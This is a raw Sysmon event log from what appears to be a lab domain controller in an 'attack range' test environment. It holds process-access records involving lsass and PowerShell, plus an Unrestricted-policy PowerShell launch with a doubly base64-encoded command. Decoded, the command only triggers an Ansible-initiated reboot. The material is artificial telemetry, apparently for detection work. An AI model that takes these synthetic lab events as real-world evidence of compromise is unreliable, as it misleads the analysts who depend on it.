10:39:18.625{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD6-5F80-0D03-000000007E01}3584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000530Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.625{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD6-5F80-0D03-000000007E01}3584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000529Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.593{733EE690-3DD6-5F80-0D03-000000007E01}3584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_kgfclpf5.5wy.ps12020-10-09 10:39:18.593 10341000x8000000000000000528Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.578{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD6-5F80-0D03-000000007E01}3584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000527Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.562{733EE690-3DD6-5F80-0803-000000007E01}39323388C:\Windows\system32\conhost.exe{733EE690-3DD6-5F80-0D03-000000007E01}3584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000526Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.562{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000525Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.562{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000524Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.562{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000523Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.562{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000522Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.562{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000521Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.562{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000520Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.562{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000519Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.562{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000518Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.562{733EE690-3C5B-5F80-0500-000000007E01}640656C:\Windows\system32\csrss.exe{733EE690-3DD6-5F80-0D03-000000007E01}3584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000517Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.562{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000516Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.562{733EE690-3DD6-5F80-0C03-000000007E01}43524880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DD6-5F80-0D03-000000007E01}3584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+691c32ed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68664177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68663e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+691154ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+686249de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68682ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68666512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68666512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+686663a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68658328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6866485b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6866444e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68664177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68663e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+691154ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6864aca9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6864a279(wow64) 154100x8000000000000000515Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.563{733EE690-3DD6-5F80-0D03-000000007E01}3584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA==C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD6-5F80-A6AA-110000000000}0x11aaa60HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3DD6-5F80-0C03-000000007E01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 10341000x8000000000000000514Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.500{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD6-5F80-0C03-000000007E01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000513Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.500{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD6-5F80-0C03-000000007E01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000512Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.468{733EE690-3DD6-5F80-0C03-000000007E01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_r00s2yzm.afc.ps12020-10-09 10:39:18.468 10341000x8000000000000000511Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.453{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD6-5F80-0C03-000000007E01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000510Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 